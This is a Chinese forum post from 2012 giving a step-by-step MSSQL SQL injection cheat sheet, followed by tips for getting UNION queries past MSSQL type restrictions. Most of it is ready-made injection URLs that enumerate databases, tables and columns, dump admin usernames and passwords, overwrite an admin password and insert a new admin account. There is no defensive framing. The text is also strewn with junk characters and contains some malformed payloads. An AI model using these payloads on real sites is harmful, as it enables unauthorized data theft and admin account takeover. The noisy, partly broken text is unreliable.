爆库:
# p O3 t a. w# c# x c! W8 [http://duck/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA.--
9 m; j( _: D1 ^5 p2 s% u- VSELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA.
; @' ~4 x0 c8 {' |爆下一个库:
/ Q/ L; R" a. b: O+ Hhttp://duck/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE TABLE_NAME NOT IN ('库名')--; ` f- M: O3 K
7 P! }6 |5 e$ s; O" x爆表:6 T+ ^* R8 o9 E0 ^, P
http://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--+ Z' j% ], A7 \ \. O+ i
( K3 M+ ]7 Q a, `9 u( r
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES.% J7 P6 W9 h% a4 E
& O/ A( r) N7 U# V+ T
爆下一个表
; p; e; m9 U- S: d9 m( _& \# \http://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--/ u; A. l1 M4 b) D8 f8 `$ G1 {
, h6 o3 Z4 j( C7 W" F& f9 [+ zhttp://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%login%'--+ }5 E* I" Y: U% C0 q7 ?" b9 H O
. Y# C2 {, f9 f7 c; u" t; s5 n0 ]& C
0 Y$ o1 n( l }5 _& ~
0 {4 ^- P9 w- s8 o6 U# C0 @
爆字段:
1 L+ T) U- m6 y6 X9 J* ?# Phttp://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
3 } k6 v% U% h; U
; W3 H! `% i/ w& A5 h& i0 g爆下一个字段0 z' h( }" R1 J: `7 Z I* t
http://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--" V7 c9 {8 |( m5 t4 m W6 K
; Y( F3 u r5 c& l$ s" n( ?: u& C
http://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
8 a9 R% }1 t4 ]5 l. s$ [- \+ S2 _# Q4 @# Z8 _; f) V$ j
* ~8 }( K5 i, ?, W3 e爆字段里的内容8 t% _0 v, u9 l2 Z$ y" g4 R8 c
http://duck/index.asp.id=10 UNION SELECT TOP 1 login_name FROM admin_login--
5 P K( Z0 p& Y+ v+ {$ v# f" v1 l" W, W
http://duck/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--8 B3 a$ `7 O* E3 k e A) T) N
; ^0 x$ S- I, i, e' {
http://duck/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--' X# j f9 |' ]1 m8 S
' @5 d( [4 q q6 _' t! l
http://duck/index.asp.id=10 UNION SELECT TOP 1 convert(int,password.morpheus.) FROM admin_login where login_name='trinity'--
, |. _7 V p. y( I3 y' ^. b& b+ o* s+ @; \: f
更新字段里的内容: O* I: P. a ?9 m7 F/ C
http://duck/index.asp.id=10; UPDATE .admin_login. SET .password. = .newpas5. WHERE login_name='neo'--, t; {- E8 i& a, w
$ k6 u `* g# F, ~1 ~4 S; R
http://duck/index.asp.id=10; INSERT INTO .admin_login. (.login_id.,.login_name.,.password.,.details.) VALUES (666,.neo2.,.newpas5.,.NA.)--
# o5 }" P$ A9 F8 t; w: h' |% D' O3 F7 z( v$ w3 |3 B
& g+ {2 P& I( P$ o1 I5 z& z# `
" ]9 K) h! o+ t+ q/ z
在注射的时候,access和mysql环境下,我们通常是通过union来获取数据的。但是遇到mssql环境,union很多时候都行不通,如果页面不报错,openrowset不可用,往往时候就只有暴力了。这样多不好,大家都是文明人,怎么可以用这么野蛮的手段呢?研究了一下,mssql中的union选择主要有以下几个方面的限制。
8 \; f( Q) x) m7 e* e( S. h 第一个是varchar/nvarchar和int类型的字段union到一起会强制转换出错。这个可以去看superhei大牛N久以前的文章,用and 1=2 把union前面的结果集置空就可以解决了。
S+ D* q; W* L0 r5 P 第二个是当前面语句选择的字段有text、ntext 或者image格式的时候,不能用DISTINCT 方式来选择,而带union的语句必然是以DISTINCT 方式来选择的。这也是为什么很多搜索型的注射点可以用union猜解的原因,因为搜索点的语句很少会选到前面三种格式的字段。Image是二进制格式,一般不会出现在需要回显的sql语句中。这种限制前段时间也看到牛淫给出了解决方法,union后面跟一个all,即union all就搞定了。真是神奇啊,牛淫就是牛淫。* g9 y3 Y: }# ]" q0 O3 x0 G
最后还有一个限制是text/ntext 与 int类型的字段 union到一起时并不兼容,会报操作数类型冲突的错误,就算用1=2把union前面语句的结果置空也一样。前几天突然想到,union的时候我们经常用1,2,3……之类的常数来补齐相差的列数。这时候后面的语句选择的都是int类型的字段,遇到前面有text/ntext的字段当然会出错,如果加上引号呢,即'1’,'2’,'3’……的形式?这时候后面的字段都是char或者varchar的类型了,应该就不会出错了。如果注射点过滤了引号怎么办?因为mssql对16进制格式的支持不是太好,很多地方用16进制必须declare――set,那就用char吧,即and 1=2 union all select char(49),char(50)……的形式。
% l6 q" G# U f- R
8 N' Z7 [% I' K- F5 f9 P" d4 w突了了大部份限制的语句/ C' \/ p/ i. F+ I# W4 s4 @/ q
and 1=2 union all select char(49),char(50),null,null;--
0 v2 {) _7 }, l3 O# G( Y" k$ Z4 b8 S; ?/ T% _: J! z
) P) i$ N0 W" m7 `" s9 Vnull也可以正常执行,不过没有回显,不好判断回显的列数。
5 H# R. ^7 Z, @1 R一般union遇到问题都是有text或者ntext字段,image的很少遇到
, q. v5 @, D8 X C& ?$ r! ~( J0 F2 N# c4 ` z
可以先null完之后再一个个用1,2,3,4代替,这样就能逼出image类型的列鸟. G) L4 d# A g5 [# Z5 O4 |
6 q8 ^) D1 i" N: f. m) Z: F& p3 C- K. c" O0 [2 n% ~+ t& I
|
发表于 2012-9-15 14:26:06
收藏
支持
反对